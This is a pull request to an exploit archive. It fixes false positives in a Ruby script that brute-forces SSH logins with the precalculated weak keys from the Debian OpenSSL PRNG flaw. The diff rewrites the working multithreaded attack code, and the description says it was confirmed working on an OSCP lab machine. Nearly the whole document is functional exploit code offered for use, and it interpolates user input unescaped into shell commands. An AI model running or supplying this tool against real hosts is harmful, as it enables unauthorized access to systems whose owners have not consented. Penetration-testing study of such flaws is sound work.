### PR TITLE
5632 - ssh prng - fix false positives

### DIFF
--- a/platforms/linux/remote/5632.rb
+++ b/platforms/linux/remote/5632.rb
@@ -6,7 +6,7 @@
 # This tool helps to find user accounts with weak SSH keys
 # that should be regenerated with an unaffected version
 # of openssl.
-# 
+#
 # You will need the precalculated keys provided by HD Moore
 # See http://metasploit.com/users/hdm/tools/debian-openssl/
 # for further information.
@@ -26,53 +26,39 @@ require 'thread'
 THREADCOUNT = 10
 KEYSPERCONNECT = 3
 
-queue = Queue.new
-threads = []
-keyfiles = []
+raise "Usage: #{__FILE__} <host> <user> <keys_dir>" unless ARGV.length == 3
+host, user, keysdir = ARGV
+counter = 1
+queue = Dir.new(keysdir).reduce(Queue.new) do |mem, file|
+  file =~ /\d+$/ ? mem << File.join(keysdir, file) : mem
+end
+totalkeys = queue.length
 
-host = ARGV.shift or raise "no host given!"
-user = ARGV.shift or raise "no user given!"
-keysdir = ARGV.shift or raise "no key dir given!"
-
-Dir.new(keysdir).each do |f|
-  if f =~ /\d+$/ then
-    keyfiles << f
-    queue << f
-  end
+def ssh_connects?(user, host, keys)
+  key_args = Array.new(keys.length, '-i').zip(keys).join(' ')
+  no_paswd = '-o PasswordAuthentication=no'
+  system("ssh -q -l #{user} #{no_paswd} #{key_args} #{host} exit")
 end
 
-totalkeys = queue.length
-currentkey = 1
+threads = Array.new(THREADCOUNT) do
+  Thread.new do
+    until queue.empty?
+      keys = [].tap { |k| KEYSPERCONNECT.times { k << queue.pop unless queue.empty? } }
 
-THREADCOUNT.times do |i|
-  threads << Thread.new(i) do |j|
-    while !queue.empty?
-      keys = []
-      KEYSPERCONNECT.times { keys << queue.pop unless queue.empty? }
-      keys.map! { |f| f = File.join(keysdir, f) }
       keys.each do |k|
-        puts "testing key #{currentkey}/#{totalkeys} #{k}..."
-        currentkey += 1
+        $stdout.write("\rTrying Key #{counter}/#{totalkeys} #{k}")
+        counter += 1
       end
-      system "ssh -l #{user} -o PasswordAuthentication=no -i #{keys.join(" -i ")} #{host} \"exit\" &>/dev/null"
-      if $? == 0 then
-        keys.each do |k|
-          system "ssh -l #{user} -o PasswordAuthentication=no -i #{k} #{host} \"exit\" &>/dev/null"
-          if $? == 0 then
-            puts "KEYFILE FOUND: \n#{k}"
-            exit
-          end
-        end
-      end
+
+      next unless ssh_connects?(user, host, keys)
+      winner = keys.find { |key| ssh_connects?(user, host, [key]) }
+      puts '', "KEYFILE FOUND: #{winner}"
+      exit
     end
   end
 end
 
-trap("SIGINT") do
-  threads.each { |t| t.exit() } 
-  exit
-end
-
-threads.each { |t| t.join }
+trap('SIGINT') { threads.map(&:exit) }
+threads.map(&:join)
 
 # milw0rm.com [2008-05-16]


### PR DESCRIPTION
The script gave false positives immediately. Fixed this
issue and cleaned up the output so progress is easier to
follow. 

Confirmed working on OSCP lab machine.

![](http://i.imgur.com/sNUKY2g.png)
